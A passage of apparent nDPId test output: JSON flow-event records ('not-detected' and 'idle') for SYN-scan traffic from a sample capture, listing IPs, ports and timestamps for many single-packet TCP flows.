{"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1827,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1827,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061157,"flow_last_seen":1278275061157,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1079,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5102,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1079,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060175,"flow_last_seen":1278275060175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1904,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1904,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1095,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1095,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1070,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1070,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9207,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1338,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9207,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9207,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9207,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1926,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061310,"flow_last_seen":1278275061310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1926,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061310,"flow_last_seen":1278275061310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1968,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061410,"flow_last_seen":1278275061410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1021,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1968,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061410,"flow_last_seen":1278275061410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060764,"flow_last_seen":1278275060764,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060764,"flow_last_seen":1278275060764,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060866,"flow_last_seen":1278275060866,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1604,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060866,"flow_last_seen":1278275060866,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1023,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1023,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3071,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":887,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5120,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":887,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5120,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1023,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1023,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3071,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1024,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 